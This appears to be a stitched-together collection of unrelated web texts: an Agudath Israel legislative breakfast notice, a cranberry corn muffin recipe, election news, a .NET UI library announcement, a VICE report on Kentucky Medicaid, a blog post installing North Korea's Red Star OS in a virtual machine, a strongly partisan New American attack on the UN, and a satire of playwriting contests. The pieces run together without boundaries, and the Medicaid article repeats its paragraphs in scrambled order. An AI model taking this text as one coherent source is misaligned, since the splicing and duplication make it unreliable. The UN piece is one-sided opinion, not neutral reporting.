This event comes a week before an election for local New York City offices, and participants will enjoy hearing the views of many NYC Councilmembers on a panel discussing “Challenges Facing the Jewish Community in New York City and the Role of Government.” Participants will include Councilmembers Robert Cornegy, Jr. (D- Brooklyn), Mark Levine (D-Manhattan), Donovan Richards (D-Southeast Queens and Rockaways), Ydanis Rodrígez (D-Washington Heights, Inwood and Marble Hill), Jimmy Van Bramer (D-Queens) and Jumaane Williams (D-Brooklyn). The Panel will be moderated by Rabbi Yeruchim Silber, Agudath Israel's director of NY Government Relations.
The November 2nd Breakfast presents a unique and valuable opportunity for Agudath Israel's lay leadership to meet and engage in dialogue with elected officials and candidates. In attendance at the event will be prominent communal, civic, religious and governmental leaders with an interest in public policy, and a proven track record of involvement and accomplishment.
A highlight of the event will be an address by NYS Attorney General Eric T. Schneiderman on issues of concern to the community. Greetings will be delivered by Acting Brooklyn District Attorney Eric Gonzalez.
Agudath Israel of America is a national Orthodox Jewish organization that services the community with a multi-faceted array of charitable, educational and social service projects. Through its national Office of Government Affairs, its full-time Washington Office, and its regional chapters throughout the nation, Agudath Israel frequently takes advocacy positions before federal, state and local governmental bodies. In so doing, Agudath Israel seeks to protect the rights and advance the interests of observant Jews and their growing network of educational and religious institutions; to promote the well-being of Israel and Jews across the globe; and to offer a uniquely Orthodox Jewish perspective on contemporary issues of public concern.
Joseph B. Stamm will serve as Chairman of the event. Mr. Stamm is the CEO and President, NYCHSRO/MedReview. The Breakfast will be sponsored by Alma Bank.
The event is being hosted by Jeffrey Weisenfeld, Principal at Alliance Bernstein Global Wealth Management, and is being coordinated by The Friedlander Group and its CEO, Ezra Friedlander.
The significance of the Legislative Breakfast is summed up by Rabbi David Zwiebel, executive vice president of Agudath Israel: “Our annual legislative event serves as an impressive demonstration of the high level of involvement of the Orthodox community and creates a timely and vital reminder that the community cares deeply about where our government leaders stand on the issues of the day.”
{Matzav.com}
Happy Christmas Eve everyone! Please excuse this deviation to my Friday posting schedule (that probably no one pays attention to aside from myself) and accept this Thursday post from The Gourmet Gourmand.
Primarily this is because I will be travelling all day tomorrow to go visit the family and anticipate that were I to attempt a post tomorrow- a rather haggard self, sitting amongst piles of luggage, laden with bags of presents, chewing on a croissant, typing away on WordPress- Dave would undoubtedly side-eye me judgmentally.
But really, in addition to spousal peer-pressure, I am in general attempting to set blog-limits, and thus intend to not post on Christmas. Because it's vacation time and the right thing to do!
(Blogaholism is real, my friends).
But before I sign out for the next several days, please let me grace your screens with photos of the best cranberry corn muffins I ever did eat. I have been craving the perfect fruit-laden corn muffins ever since having the.most.perfect. corn muffin in San Francisco (or was it Oakland?).. I can't remember even where we were or why we were there but this muffin is forever burned into my memory.
The muffins were dense and moist, textured, yet tender, and topped with fresh strawberries baked into these little golden nuggets.. adding additional flavor and moistness that “till this moment I never knew myself” (yes I just finished reading Pride and Prejudice for the 10,000th time…). So here is my contribution to the world of corn muffin recipes. This recipe decidedly has a higher quantity of eggs than most corn muffins, so I think this accounts for the difference in texture. This muffin really does the original justice- it is light and moist, with subtle sweetness, and pockets of tart cranberries, and of course a delightful chewiness from the cornmeal that adds to the texture without becoming problematically crunchy or dry. In fact, these are the antithesis of the dry, crumbly corn bread that makes me want to hang my head in shame on the baker's behalf.
And I think it goes without saying that cranberries are the perfect addition to this recipe. While I deeply enjoyed the original strawberry version, fresh cranberries are in season right now, and really go exceptionally well with the corn flavor. Their tartness plays off the delicate sweetness well, and release just a little bit of juice to add extra moisture to the muffins.
(Cook's note- I really would not substitute dried fruit here, unless you are looking to fundamentally change the recipe.)
(Also thanks to Emily for her hand-modeling debut… 🙂 )
Merry Christmas all!
Print Yum Cranberry Corn Muffins Prep Time: 15 minutes Cook Time: 17 minutes Yield: Makes 24 muffins Adapted from Pioneer Thinking Ingredients 2 cups yellow cornmeal (I used Bob's Red Mill)
2 cups all-purpose flour
2 tablespoons baking powder
1 teaspoon baking soda
¼ teaspoon salt
2 cups whole milk
4 large eggs
½ cup melted butter, plus more butter (softened) for greasing muffin tins
1 cup real maple syrup
2 cups fresh cranberries Instructions Preheat the oven to 425 degrees. Using pastry brush and softened butter, grease the muffin tin. In a large mixing bowl combine cornmeal, flour, baking powder, baking soda, and salt. Whisk ingredients together. Gradually pour in milk, eggs, melted butter, and maple syrup. Whisk until just combined, but don't over-mix. Gently stir in cranberries. Using a 1/3 cup measuring spoon, fill muffin tins. Bake for 13-17 minutes or until toothpick inserted into center of muffin comes out clean. (Mine took exactly 15 minutes). Schema/Recipe SEO Data Markup by Yummly Rich Recipes 0.1 http://www.thegourmetgourmand.com/cranberry-corn-muffins/
BARRACKVILLE , W.Va. | Even though the name has a different pronunciation, this might just become Obama Town.
Tucked in northern West Virginia's coal country, this town of fewer than 1,300 people is filled with white, working-class voters who provided Sen. Hillary Rodham Clinton a 41-point primary win and fueled speculation that a black presidential candidate couldn't carry the state despite its historical Democratic tendencies.
Now, Sen. Barack Obama's campaign signs dot the landscape, reflecting a shift that has taken the state from being a lock for Republican Sen. John McCain into a battleground in the final days of the campaign.
Patrick Powell is an unlikely Obama voter, and said he doesn't even like the man. His wife is frustrated that Mrs. Clinton didn't win, and his good friend blasts Mr. Obama as unpatriotic and refusing to recognize the American flag.
But all three of them say they won't be voting for Mr. McCain.
Introducing Comet
5 minute read
Let's talk about the Universal Windows Platform [for those unfamiliar, here you go: get started].
Specifically, lets talk about creating great user experiences and how I can. I've spent some time these past few years working with the Windows Runtime, starting with Windows 8, both professionally and personally, and I've started to think about how to best package the different controls and utilities I've been creating and share them with others who might find them helpful.
Therefore, I'm introducing Comet.
What is it?
Comet is an open source library for .NET/XAML Universal Windows Apps that attempts to fill the gaps and provide a collection of APIs and controls based on the feedback and work from the developer community. The XAML/.NET framework for the Universal Windows Platform is a continuously growing developer framework, but there are controls and utilities that are missing.
Today I'm releasing v0.1. I'm starting small with a goal to grow. Initially, Comet contains:
PullToRefreshListView
Pull to Refresh is one of the most used gestures on all mobile touch platforms, but it's not something that is provided out of box for XAML. I've seen many different implementations for XAML, and there is even an official sample by Microsoft of a simple implementation. However, I've never been satisfied by the performance, behavior, or functionality of these implementations. I created my own:
The above is from the CometMailSample that I've included with the source. I wanted to create a control that can be used to create rich and performant pull-to-refresh animations, but something that is easy to use.
Here is a quick example (not the same one as above, but not much more complicated):
<c:PullToRefreshListView x:Name="listView" ItemsSource="{x:Bind Items}" RefreshRequested="listView_RefreshCommand" PullProgressChanged="listView_PullProgressChanged"> <c:PullToRefreshListView.ItemTemplate> <DataTemplate x:DataType="data:Item"> <TextBlock Text="{x:Bind Title}" /> </DataTemplate> </c:PullToRefreshListView.ItemTemplate> <c:PullToRefreshListView.RefreshIndicatorContent> <Border HorizontalAlignment="Center" x:Name="refreshindicator" CornerRadius="30" Height="20" Width="20" ></Border> </c:PullToRefreshListView.RefreshIndicatorContent> </c:PullToRefreshListView>
private void listView_PullProgressChanged ( object sender , Comet . Controls . RefreshProgressEventArgs e ) { refreshindicator . Opacity = e . PullProgress ; refreshindicator . Background = e . PullProgress < 1.0 ? new SolidColorBrush ( Colors . Red ) : new SolidColorBrush ( Colors . Blue ); }
SlidableListItem
The Outlook UWP app has one of the best gesture pasterns, which allows quick actions to be performed by simply sliding an email left or right (a huge time saver). It's a pattern that has been used by many other apps, but not something that is easily done in XAML. It's a pattern that I wish other apps used. I created my own:
As before, the above is part of the CometMailSample that I've included with the source. I wanted to make it customizable so any application can take advantage of the pattern, and make my life as a consumer much easer. :)
Here is a simplified example:
<DataTemplate x:Key="EmailsItemTemplate" x:DataType="data:Item"> <c:SlidableListItem LeftIcon="Favorite" RightIcon="Delete" LeftLabel="Set Favourite" RightLabel="Delete" HorizontalAlignment="Stretch" LeftBackground="Green" RightBackground="Red" MouseSlidingEnabled="true" LeftCommand="{x:Bind ToggleFavorite}" RightCommandRequested="RightCommandRequested"> <Grid Height="110"> <StackPanel Margin="10,0,0,0"> <CheckBox IsChecked="{x:Bind IsFavorite, Mode=OneWay}"/> <TextBlock Text="{x:Bind Title}" TextWrapping="NoWrap"/> </StackPanel> </Grid> </c:SlidableListItem> </DataTemplate>
It's worth noting that this control is not required to be used in a ListView. It can be used as a standalone container :)
Converters and Extensions
Comet.Converters
DateTimeFormatConverter : Converter to convert DateTime to string with the specified format (parameter)
: Converter to convert DateTime to string with the specified format (parameter) HexToSolidColorBrushConverter : Converts string conteining hex color of the form (#FFFFFFFF) to SolidColorBrush
: Converts string conteining hex color of the form (#FFFFFFFF) to SolidColorBrush ValueWhenConverter: Converter for returning a specific value when a value equals to the spcified Value, or returning otherwise
Comet.Extensions
XamlExtensions:
UIElement.RenderToRandomAccessStream() : Render a UIElement into a bitmap IRandomAccessStream
: Render a UIElement into a bitmap IRandomAccessStream UIElement.RenderToBitmapImage() : Render a UIElement into a bitmap
: Render a UIElement into a bitmap DependencyObject.FindChildren<T>(): Traverses the Visual Tree and returns a list of elements of type T
What is the goal?
The goal is to fill the gaps in the UWP .NET/XAML platform and provide a collection of APIs and controls based on the feedback and work from the developer community.
The final result is a quality library that is:
Open Source : all development and tracking is on GitHub
: all development and tracking is on GitHub Lightweight : Common problem with seasoned libraries and frameworks that have been in the community for a while is that they tend to bloat over time. With Comet, we want to keep the framework lightweight and free from any dependencies other than the Universal Windows Platform. As the framework grows, and especially if any dependencies are unavoidable, we may split up the library in multiple smaller modules.
: Common problem with seasoned libraries and frameworks that have been in the community for a while is that they tend to bloat over time. With Comet, we want to keep the framework lightweight and free from any dependencies other than the Universal Windows Platform. As the framework grows, and especially if any dependencies are unavoidable, we may split up the library in multiple smaller modules. Documented: Finding documentation and samples is is the first thing that any developers does when they are first trying to get started. Need to make documentation clear and easy to find as well as provide plenty of samples
Where do I get it?
Easy, just use NuGet directly from Visual Studio and search for Comet or run the following command in the Package Manager Console:
Install-Package Comet
In addition to the regular release in NuGet, I will also release prerelease version of Comet for those who want to try the work-in-progress-that-might-not-work.
Alternatively, this is an open source project after all and you can directly reference Comet in your project or build a NuGet package with the included scripts.
Something is broken (or) I have the best idea for a control/toolkit/feature)
Great, please create an issue. I'm sure there will be bugs and great ideas, and the GitHub project Issues will be the place to keep track of them.
And of course, this is an open source project. Feel free to fork the project and ideally submit a pull request ;)
License
The project is licensed under the MIT License (MIT)
Keep hacking my friends!
The Obama administration touts Kentucky as an Affordable Care Act success story, but the state's new governor, Republican Matt Bevin, says the Medicaid program is too expensive . GOP leaders in Washington have also made gutting Obamacare their first order of business in 2017, promising to replace the law — but offering few details about their plan, causing concern that people like Williams will again be left uninsured.
Williams is one of about 450,000 Kentucky residents who have enrolled in Medicaid since 2014, when Democratic Gov. Steve Beshear opted the state into Obamacare's federally funded expansion of the health program for the poor. The move helped drop Kentucky's uninsured rate from 20 percent to 7.5 percent.
“I was buying stuff off the streets to help control my pain and things until I got the insurance,” Williams said recently from a halfway house in Louisville. “I think if I'd been able to afford insurance all along maybe it wouldn't have gone that far.”
Getting locked up could have easily triggered a downward spiral for Williams, leaving the mother of five and grandmother of two unemployed, uninsured, and almost certain to relapse. But she obtained health coverage through Kentucky's expansion of Medicaid under the Affordable Care Act, which allowed her to see a doctor. The physician diagnosed her with rheumatoid arthritis, PTSD, and high blood pressure, and referred her to pain management to treat her back pain and migraines.
Until recently, Melissa Williams was perpetually in pain. The 45-year-old Kentuckian survived a shotgun blast to the back when she was 12, and the injury has nagged her ever since. Unable to afford insurance as an adult, she began to self-medicate with painkillers and other opioids, developing an addiction that ultimately landed her in jail.
Read more
Until recently, Melissa Williams was perpetually in pain. The 45-year-old Kentuckian survived a shotgun blast to the back when she was 12, and the injury has nagged her ever since. Unable to afford insurance as an adult, she began to self-medicate with painkillers and other opioids, developing an addiction that ultimately landed her in jail.
Getting locked up could have easily triggered a downward spiral for Williams, leaving the mother of five and grandmother of two unemployed, uninsured, and almost certain to relapse. But she obtained health coverage through Kentucky's expansion of Medicaid under the Affordable Care Act, which allowed her to see a doctor. The physician diagnosed her with rheumatoid arthritis, PTSD, and high blood pressure, and referred her to pain management to treat her back pain and migraines.
“I was buying stuff off the streets to help control my pain and things until I got the insurance,” Williams said recently from a halfway house in Louisville. “I think if I'd been able to afford insurance all along maybe it wouldn't have gone that far.”
Williams is one of about 450,000 Kentucky residents who have enrolled in Medicaid since 2014, when Democratic Gov. Steve Beshear opted the state into Obamacare's federally funded expansion of the health program for the poor. The move helped drop Kentucky's uninsured rate from 20 percent to 7.5 percent.
The Obama administration touts Kentucky as an Affordable Care Act success story, but the state's new governor, Republican Matt Bevin, says the Medicaid program is too expensive. GOP leaders in Washington have also made gutting Obamacare their first order of business in 2017, promising to replace the law — but offering few details about their plan, causing concern that people like Williams will again be left uninsured.
‘We can't afford to have this — we just can't.'
Advocates have repeatedly warned that repealing Obamacare without replacing it will have dire public health consequences, but the potential impact of such a move on the criminal justice system has largely been overlooked. Researchers estimate that 70 percent to 90 percent of the approximately 10 million individuals released from U.S. prisons and jails each year are uninsured, and about 40 percent of incarcerated people have at least one chronic health condition, such as diabetes or hypertension.
“Health is a huge issue that puts people in jail and prison,” said Adeline Nyamathi, a distinguished professor at the UCLA School of Nursing who recently led a study of 600 California parolees that found providing health counseling and basic services reduced the recidivism rate by 12 percent. “Health is one of the things that helps to stabilize [former inmates] and get them thinking about their long-term future.”
In Louisville, authorities have helped jail inmates get health insurance prior to their release. Since 2014, 1,870 ex-prisoners in the city have been enrolled in health coverage, with about 95 percent of them covered by Kentucky's expansion of Medicaid under Obamacare.
“If you don't feel good and you're not capable of going to work, not capable of taking care of yourself, and you still have to survive, then you're gonna get involved in behavior that's not helpful,” said Steve Durham, assistant director of the Louisville Metro Department of Corrections. “You're gonna steal from people. You're gonna use drugs to mask your symptoms. You're gonna end up being arrested.”
Despite studies that show the Medicaid expansion saves states money in the long run, Bevin, who was elected governor in 2015, has said Kentucky can't afford it. About a third of the state's residents are now covered under Medicaid at an approximate total cost of $10 billion per year — but Kentucky doesn't pay most of that.
The federal government foots 70 percent of the bill for traditional Medicaid, which serves low-income pregnant women, poor children, disabled people, and other disadvantaged groups. Federal funds currently cover the entire cost for the 450,000 people who obtained Medicaid through the Obamacare expansion, though that figure drops to 95 percent this year and eventually to 90 percent.
Bevin declined a VICE News interview request, but a plan he proposed last year would do away with automatic dental and vision benefits, enact work requirements, and charge small monthly premiums for “able-bodied” adults on Medicaid.
Emily Beauregard, executive director of the advocacy group Kentucky Voices for Health, says Bevin's proposal will be especially bad for groups at high risk of being arrested, such as people with substance abuse problems.
“All of these things are going to reduce access to care — people who have addiction problems are not going to be able to jump through all those hoops,” Beauregard said. “Over the past year we've taken a lot of steps backward, and now it seems we're a cautionary tale for the rest of the country in terms of what lies ahead.”
In Congress, the Senate voted 51-48 on Wednesday to take the first step toward repealing Obamacare, and House Speaker Paul Ryan pledged to follow suit. President-elect Donald Trump tweeted about ending “the failed ObamaCare disaster,” but said during his campaign that there would be “no cuts” to Medicaid when the law is repealed. Both Trump and Ryan have been short on specifics about how that would be accomplished, however, and the nonpartisan Congressional Budget Office estimates that more than 14 million people will lose coverage if the Medicaid expansion is eliminated.
‘It makes me nauseated to think we might go back to the way things were before the Medicaid expansion.'
The blueprint for repealing Obamacare comes from Tom Price, a former surgeon and Georgia congressman nominated by Trump to be the next secretary of the Department of Health and Human Services. Price's proposal, which called for giving states block grants to fund Medicare, was approved by Congress last year but vetoed by President Obama.
Democrats, including Kentucky Rep. John Yarmuth, say Price's Obamacare alternative would be a disaster for the poor, requiring people with tight budgets to set aside money to buy private health insurance, and creating complicated requirements to receive Medicaid.
“Everybody who's looked at the Price plan has concluded that it would definitely result in a loss of coverage for millions of Americans,” Yarmuth said. “It would favor very wealthy Americans and leave people of low income out of the picture.”
A spokesperson for Price declined to comment.
Across Louisville, those who work closely with people involved in the criminal justice system are deeply concerned about what will happen in the coming months. Dr. Barbara Casper, a professor of medicine at the University of Louisville who operates a clinic that serves the indigent, including many former inmates, said the Affordable Care Act dropped the uninsured rate among her patients from about 50 percent to 5 percent.
“I just cannot imagine going back to the way things were before the Medicaid expansion,” Casper said. “It was awful trying to get people the things they need. I spent hours trying to figure out what medication I could get my patients that they could afford. It makes me a little bit nauseated to think we might go back to that.”
Jan Louden, a social worker at the Louisville jail who enrolls qualifying inmates in Medicare, said doing away with the program would be “devastating” for the community, and that the long-term costs would be greater than whatever money is saved in short-term spending.
“It's a mind boggling thing that they could take this away,” she said. “Look at what it's going to do to crime, look at what it's going to do to families, to children, to the people, to our city. We can't afford to have this — we just can't.”
For Williams, the woman at the halfway house who suffers chronic pain, the prospects of obtaining health care without Obamacare's Medicaid expansion are bleak. With her health conditions, she says the only work she can find is in the fast-food industry, which typically pays minimum wage and does not offer insurance.
“Without insurance and being able to get the treatment I need, I will probably end up in a mental institution again,” she said. “I've been there before without my medication, and that's not really where I want to spend the rest of my life.”
Earlier this week, someone who goes by slipstream (“pulling data out of DPRK's ass since 2014!”) posted a torrent of North Korea's Red Star 3.0 installer. My first instinct was to download and run it, because installing software from North Korea, what could possibly go wrong?
First, I made a virtual machine using VMware's “Other Linux 3.x kernel 64-bit” preset. (If you want to install it: The exact preset probably doesn't matter. Just make sure you give it enough RAM. Also make sure you turn off all the fancy features, like webcam passthrough, USB devices, file/printer sharing, and possibly networking if you're really paranoid.)
When I booted up the VM, I was greeted by this welcome screen. The most recent version is skinned to look like Mac OS X — previous versions copied Windows 7.
Note: I replaced some of the bigger screenshots with JPEG versions to make this page load faster. Click through to see screenshots in their all their lossless PNG glory.
I think this dialog is trying to tell me that the disk isn't formatted, but I can't read Korean so I just clicked the darkened button.
Picking a disk to format. Anyone who's installed OS X before will find this screen familiar.
For some reason, it lets you format the disk as HFS or HFS+! I didn't try this but it seems unlikely to work — I don't know of any Linux distro that natively mounts HFS+ as read/write. (Maybe the HFS+ option is part of their Mac skin.)
After formatting the disk, the installer had a few more screens with settings. First up is creating a user account:
The default networking setting was static IP, which is the opposite of the default on major operating systems (DHCP). Maybe most people using computers in North Korea have their IPs assigned by a sysadmin? (If anyone knows why, it's probably Will Scott, who spent two semesters teaching computer science there.)
Time zone — if you care about picking the right city, put the name through Google Translate and then use the drop-down menu.
On the date picker, it looks like they ripped the assets straight out of OS X. We'll see more of this later.
Now, you're ready to install the malware! glorious operating system that follows juche ideals.
The installer beachballed a few times, but I just let it do its thing and eventually it finished.
Upon reboot, the VM came up with a bootloader — probably just skinned GRUB.
Anyone else bothered by the compression artifacts on that logo?
…and we're in the desktop environment! Fake Activity Monitor in the front, with a fake Finder window peeking out from the back. Yep, definitely Linux under the hood.
My first impression: this is a surprisingly well done skin. I was expecting something more janky, but I haven't been able to find many user interface bugs. If you are thinking about switching to Linux, but want to keep the Mac user interface, North Korea's Red Star is the way to go! (Please don't actually do this.)
You can check out Red Star for yourself:
Download torrent
Magnet link
Pointing to the killing of Michael Brown by police officer Darren Wilson along with subsequent unrest in Ferguson and policing issues, the dictator-dominated United Nations just launched another brazen assault on America, U.S. sovereignty, and the gun rights of Americans. UN boss Ban Ki-moon (shown), the global body's “Human Rights Council,” and even the UN “Committee against Torture” all took turns lambasting the United States as an alleged stronghold of systemic racism and police brutality. To fix the problems, the UN argued, Americans and their elected officials must submit to the demands of self-styled global “authorities” — including more unconstitutional gun control to further restrict access to firearms, and UN rules for police.
The latest series of condemnations and directives offered by the controversial global outfit are merely the most recent in a developing pattern. Indeed, as The New American has documented for years, the phony outrage by the planetary body follows an accelerating spate of UN attacks on America and its constitutional system of federalism and limited government. The UN complaints, meanwhile, increasingly come with a growing list of UN demands on how local, state, and federal authorities must allegedly bow down to what globalist bureaucrats describe as “international law.”
The most recent UN meddling in U.S. affairs began shortly after the grand jury's decision not to indict Officer Wilson for the slaying of Brown. In the immediate aftermath, UN boss Ban, perhaps misunderstanding the nature of his job as chief of an organization dominated by autocratic and oftentimes brutal regimes, offered some unsolicited advice to both protesters and law enforcement officials. Speaking through a spokesperson, Ban, who in August demanded that local police in Ferguson adhere to “international standards,” called on both demonstrators and police to be “peaceful.”
“[The Secretary-General] appeals to all those in Ferguson and throughout the United States who felt disappointment at the grand jury's decision to make their voices heard peacefully and to refrain from any violence,” UN spokesman Stephane Dujarric told reporters at a news conference, as if it were totally normal for the UN to involve itself in the affairs of an American town and dispense instructions to U.S. protesters. “He also calls on law enforcement authorities, whether at federal, state, or at the local level, to protect the rights of people to demonstrate peacefully and to express their opinions peacefully.”
According to Ban's spokesman, the UN boss also wanted to echo the appeal made by Michael Brown's parents to “turn this difficult time into 'positive change.' ” Ban, whose own UN “peacekeeping” forces have been exposed slaughtering and raping civilians systematically all across Africa and beyond, said his thoughts were “first and foremost” with Brown's family and with the “entire Ferguson community.” The establishment press celebrated Ban's involvement.
Also on November 25, the UN “Human Rights Council” — a widely ridiculed body that is literally packed with barbaric communist and Islamist regimes — also condemned the United States over alleged racism and police brutality. “I am deeply concerned at the disproportionate number of young African Americans who die in encounters with police officers, as well as the disproportionate number of African Americans in U.S. prisons and the disproportionate number of African Americans on Death Row,” complained UN “High Commissioner for Human Rights,” Zeid Ra'ad Al Hussein of Jordan, in a statement released by his office.
The UN “human rights” attack on the United States came after a pathetic spectacle in which Brown's parents travelled to Geneva to request that the UN arrest Officer Wilson and charge him with “torture” and various other “human-rights” abuses. “We need the world to know what's going on in Ferguson and we need justice. We need answers and we need action. And we have to bring it to the UN so they can expose it to the rest of the world, what's going on in small town Ferguson,” said mother Lesley McSpadden during an appearance on CNN, one of the myriad establishment media outfits that continue to shamelessly hype both the false UN-as-benevolent-global-regime narrative and the Ferguson story.
The UN's self-styled “human rights” boss also claimed in a UN press release that the Missouri grand jury's decision not to indict Wilson “spotlighted broader concerns about institutionalized discrimination across the United States.” Ironically, he also admitted right after his claim that he had not seen the evidence presented to the grand jury that it based its decision on. That means Hussein was “unable to comment on whether or not the verdict itself conformed to international law,” the UN said in a press release.
It was not immediately clear which alleged “international law” Hussein had in mind, or why he believed the tyranny-dominated global outfit believes it can create and foist supposed “laws” on the independent people of the United States who are supposed to govern themselves. Treaties, of course, do not grant the federal government any new powers and must be made in pursuance of the Constitution to be valid. Still, even after admitting to not knowing the facts, Hussein called on the Obama administration to go beyond its constitutional powers and start essentially overseeing state and local law-enforcement issues under the guise of ensuring “fairness.”
“It is clear that, at least among some sectors of the population, there is a deep and festering lack of confidence in the fairness of the justice and law enforcement systems,” Hussein continued in his statement, which, while true, should not be a concern of a global body, ridiculed as the "dictators club," that puts genocial mass-murderers on its "human rights" body. “I urge the U.S. authorities to conduct in-depth examinations into how race-related issues are affecting law enforcement and the administration of justice, both at the federal and state levels.” Of course, under disgraced Attorney General Eric Holder — in contempt of Congress for lying about arming Mexican drug cartels — U.S. authorities have launched plenty of such “investigations.”
Hussein also commented on the tragic killing of a 12-year-old Ohio boy by police, who apparently mistook his toy gun for a real weapon and executed him within seconds, just a few days before the grand jury announced its decision in the Ferguson case. According to the UN “Human Rights” czar, sounding a lot like homegrown race profiteers who seek to exploit every tragedy to stir up racial tensions, the shooting of the boy, Tamir Rice, “reiterated racial disparity in deaths at the hands of U.S. police officers.”
Even more alarming, though, was Hussein's effort to exploit the tragedy to push yet another UN attack on the God-given right to keep and bear arms enshrined in the Second Amendment to the U.S. Constitution and virtually every state constitution. “In many countries, where real guns are not so easily available, police tend to view boys playing with replica guns as precisely what they are, rather than as a danger to be neutralized,” Hussein said in the statement, adding that Rice's killing “placed the issue of gun-related deaths in the U.S. back into focus.” The UN has a long history of opposing the human right to self-defense, even helping brutal regimes to disarm the populations they hope to enslave.
Perhaps even more outrageous than a “human rights” bureaucrat's attack on one of the most fundamental human rights, however, were references to UN “policies” for police. Citing “Article 9 of the UN's Basic Principles on the Use of Force and Firearms by Law Enforcement Officials,” the UN human rights czar “confirmed” that police must “not use firearms against persons except in self-defense or defense of others against the imminent threat of death or serious injury.”
“In any event, intentional lethal use of firearms may only be made when strictly unavoidable in order to protect life,” the bombastically titled “High Commissioner for Human Rights” concluded in his statement. Hussein's demand of local American police — who are supposed to be responsible to local taxpayers and communities and follow American constitutional principles rather than UN decrees — follows another recent demand by UN boss Ban that local U.S. police follow what he called “international standards.”
A few days after the UN operatives sought to exploit events in Ferguson, a conveniently timed report by the UN “Committee against Torture” similarly excoriated American law enforcement for alleged police brutality. In its latest “review” of the U.S. record on “torture,” the UN blasted the administration of the death penalty, prison conditions, and allegedly systematic use of excessive force against blacks, immigrants, homosexuals, and more. The UN body also lashed out at the “frequent and recurrent police shootings or fatal pursuits of unarmed black individuals.” UN operatives on the panel called for an “independent mechanism” to investigate and punish police who defy "international law." Globalists, race profiteers, and Big Government mongers in the United States (such as the ACLU) celebrated the UN attacks and demands, perhaps unaware of the track record of ruthlessness from both the UN and its largely totalitarian member regimes.
American communities have every right to decide how their local police should operate, within the confines of America's system of constitutional government that is supposed to exist to protect the unalienable rights of individuals. In fact, this magazine has raised numerous concerns about everything from the over-militarization of law enforcement encouraged by the federal government to the overabundance of criminal statutes and regulations that has grown far beyond any semblance of legitimate government. The killing of Tamir Rice, too, was undoubtedly a horrifying tragedy from any perspective.
However, not only does the UN have no business or authority meddling in U.S. affairs, it would be hard to think of a body less qualified to interfere in the first place. The UN is not known as the dictators club for nothing — even its pseudo-“human rights council” features such paragons of human rights as the brutal regimes ruling Cuba, Vietnam, Communist China, Saudi Arabia, Algeria, and more. Congress should immediately stop funding the UN and its attacks on America before organizing an orderly withdrawal from the autocratic outfit altogether.
Photo of UN Secretary-General Ban Ki-moon: AP Images
Alex Newman, a foreign correspondent for The New American, is normally based in Europe. Follow him on Twitter @ALEXNEWMAN_JOU. He can be reached at This email address is being protected from spambots. You need JavaScript enabled to view it.
Related articles:
UN Boss Pushes “International Standards” for Ferguson Police
From Ferguson to Geneva: Michael Brown's Parents Ask UN to Arrest Officer Wilson
UN “Human Rights” Report Attacks U.S. Gun Rights, Constitution
Ruthless Tyrants Win Seats on UN “Human Rights” Council
UN Demands Obama “Nullify” Stand Your Ground Laws
UN "Human Rights" Boss Questions Fla. Law, Demands Justice for Trayvon
Citing International “Law,” UN Demands U.S. End Death Penalty
UN “Human Rights” Bureaucrats Demand Global “Law” for Detroit
UN Demands Obama Smash State Marijuana Legalization
Sudan's Mass-murdering Tyrant May Join UN “Human Rights” Council
UN “Peacekeeping” Troops Face Scandals on Sex Crimes, Corruption
With UN Support, Socialist Chavez Disarms Civilians in Venezuela
Communist China Blasts Second Amendment, U.S. Human-rights Record
The United Nations: On the Brink of Becoming a World Government
Submission Opportunities for Emerging Playwrights
THE MAJESTIC ROYALE THEATRE PLAYWRITING COMPETITION is now accepting entries. Winner receives staged reading and $50 cash prize. Entry fee: $60. We will also automatically withdraw a $10 notification fee from your PayPal account when you reach the end of this sentence. Winning playwright must travel at his or her own expense to Hoopers Mill, Wisconsin, by way of Kenosha, because our Managing Director left his umbrella in a diner there so it would be cool if you could swing by and pick it up for him.
- - -
THE PLAYWRIGHTS' THEATRE OF ACTORS' SEMI-ANNUAL 8-TO-11-MINUTE PLAY FESTIVAL presents plays inspired by a common theme. This round's theme: paper towel absorbency. It is not necessary to use paper towels on stage, but the plot must hinge on the absorbency of paper towels, in either a literal or metaphorical sense. Scripts about linen towels will be returned unread.
- - -
REPERTORY REP'S DRAMALAMADINGDONG seeks plays about Disability and/or the Spanish-American War. Playwrights should meet at least two of the following criteria: current resident of Colorado or Delaware; direct descendant of pirates; Capricorn. No “kitchen-sink” plays; plays depicting kitchens without sinks or sinks in other rooms OK.
- - -
THE FESTIVAL OF REALLY REALLY UNHEARD VOICES seeks plays about the experience of being Transracial, Unlesbian, Biskeletal, or happy with your cable and internet provider. Scripts must pass the Bechdel Test and fail the Mamet Test.
- - -
SUGARPLUM JUNCTION CHILDREN'S THEATRE seeks family-friendly musicals about the long-term hazards of endocrine disruptors in the environment. Relevant STEM learning concepts from the Common Core should be incorporated into the lyrics, as children will not be allowed to leave the theatre until they pass a standardized exam. Cast size: 3, 4, or 6, but not 5. Note: All productions must include a cameo for “Stella,” our well-behaved monitor lizard.
- - -
SPORK ENSEMBLE THEATRE seeks plays for our resident company of 14 actors. All submitted scripts should have exactly 14 characters, 13 of which must be played by a single actor, with the remaining character's role distributed equally across the other 13 actors. The entire script must also be a palindrome.
- - -
THE SOUTH CENTRAL NORTH DAKOTA FESTIVAL OF NEW MUSICALS is launching next season's Broadway hits in Bismarck's up-and-coming Penitentiary District. Interested applicants should submit: a) the full script along with two contrasting ten-page excerpts, labeled “A” and “1” respectively; b) a breakdown of all characters in the show; c) a breakdown of all characters not in the show; d) five copies of a good-quality demo in CD, mp3, and limited-edition 12" vinyl format (numbered and signed); and e) a description of the target audience, including individual names, phone numbers, and short bios, along with likely availability for Festival performances (usually Wednesdays at 7:15 am or midnight). Author's names or other identifying information should not appear on ANY submitted material, and instead should be shouted into a paper bag and mailed under separate cover. Winners must finance their own productions under an Equity WTF contract, but will be given 50 postcards and a megaphone for publicity, along with two hours of access to the green room fridge (bottom shelf only).
- - -
FARTING SQUID PRODUCTIONS commissions new plays about wartime atrocities in sub-Saharan Africa. Future productions must acknowledge Farting Squid above the title.
- - -
THE MARYBETH TRIGIANNI ARTISTS' RESIDENCY offers playwrights time to write and reflect in idyllic suburban Baltimore, in exchange for light housekeeping, meal preparation, and miscellaneous home repairs. Your room in our main residence, a quaint 1983 Split-Level Ranch, includes new bedding mounted on a full-sized washer/dryer, direct access to a two-car garage, and an in-room pantry fully stocked with Diet Sierra Mist and Wheat Thins. Your hosts include an emerging Literary Manager on maternity leave and her useless husband. Writer-pediatricians encouraged to apply.
----------
NE COLUMBUS -- The Nazareth Restaurant & Deli may be staying open after all. That's the word from owner Hany Baransi and his wife after speaking to local media outlets about his initial decision to close the longtime, popular eatery after the Feb. 11 attack that left four patrons hurt.
